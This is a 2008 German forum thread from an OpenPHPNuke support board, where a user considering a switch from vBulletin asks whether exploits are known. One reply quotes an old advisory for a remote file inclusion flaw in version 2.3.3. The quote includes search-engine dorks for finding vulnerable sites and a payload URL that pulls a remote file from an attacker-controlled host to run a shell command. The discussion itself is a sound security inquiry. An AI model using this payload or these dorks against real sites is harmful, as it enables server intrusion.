Forum

Moderiert von: stefan, spinne
Forum: Bug oder nicht...
Sie schreiben eine Antwort zum Thema: Gibts eine Exploitliste ?
Gehe zu: OpenPHPNuke - das Open Source CMS Forum Index


über den Beitrag: Auch anonyme Benutzer können in diesem Forum neue Themen eröffnen und Antworten schreiben.
Benutzername:
Nachrichtensymbol:
                                                                                                                       

more...


HTML : An
BBCode : An
 


Klicken Sie auf die Smilies, um diesen in Ihre Nachricht einzufügen:

Very Happy Very Happy Smile Smile Sad Sad Surprised Surprised
Confused Confused Cool Cool Laughing Laughing Mad Mad
Razz Razz Embaressed Embaressed Crying (very sad) Crying (very sad) Evil or Very Mad Evil or Very Mad
Rolling Eyes Rolling Eyes Wink Wink Another pint of beer Another pint of beer ToolTimes at work ToolTimes at work
I have an idea I have an idea

more... 
Einstellungen:







 
Sicherheits-Code
Sicherheits-Code
Neu laden

Thema im Überblick

Autor
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 14:59

Nett, Danke das schau ich mir mal an !!

..Sobald meine 16094 files per SFTP endlich aufm US-Host sind
(t- 2:00 - 4:00 h)



Zitieren Druckerfreundliche Darstellung nach oben
Gast
Unregistrierter Benutzer
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 14:49

Schau mal hier den Thread zur EVA an.

Werde schauen, dass die Customizer Module demnächst in der Doku stehen.

Flash
[addsig]

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 13:46

EVA = Eingabe/Verarbeitung/Ausgabe ?
Oder ist das ein spezieller Scriptbestandteil des CMS ?

Klingt interessant




Zitieren Druckerfreundliche Darstellung nach oben
Gast
Unregistrierter Benutzer
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 12:59

Im 2006 gab es ein Exploit. Das ist aber auch das einzige wo bekannt ist.
Der Bug war damals in der Version 2.3.3

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls


Das CMS hat mir der EVA ein ausgeklügelter Sicherheitsmechanismus für Angriff aller Art.


Flash
[addsig]

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 11:32

Danke, aber das denkt VBulletin auch. (Auch wenns kein CMS in dem Sinne ist :d)

Naja ich teste datt mal, danke für die Antwort :d



Zitieren Druckerfreundliche Darstellung nach oben
Scout_GP

Registriert: 16.06.2005
Beiträge: 1054
Wohnort: Berlin


Sende eine Private Nachricht an Scout_GP Besuche die Homepage von Scout_GP
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 11:26

Es gibt keine Exploits. Soweit ich weiß, ist bei vernünftiger Serverkonfiguration und vernünftiger OPN Konfiguration zur Zeit kein eindringen möglich.
Sollte doch eine Schwachstelle bekannt werden, so wird diese sofort korrigiert. OPN ist meines erachtens das CMS, was den höchsten Wert auf Sicherheit legt.



Gruß Scout
+++ Last.fm | Scoutweb +++

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Gibts eine Exploitliste ?

Geschrieben: 03.03.2008 11:11

Tach !

Denke gerade drüber nach von Vbulletin auf OpenPHP Nuke umzusteigen und frage mich inwieweit es da mit der Sicherheit ist.

Sind irgendwelche Exploits bekannt oder gibts eine Liste derer ?

Grüße


Zitieren Druckerfreundliche Darstellung nach oben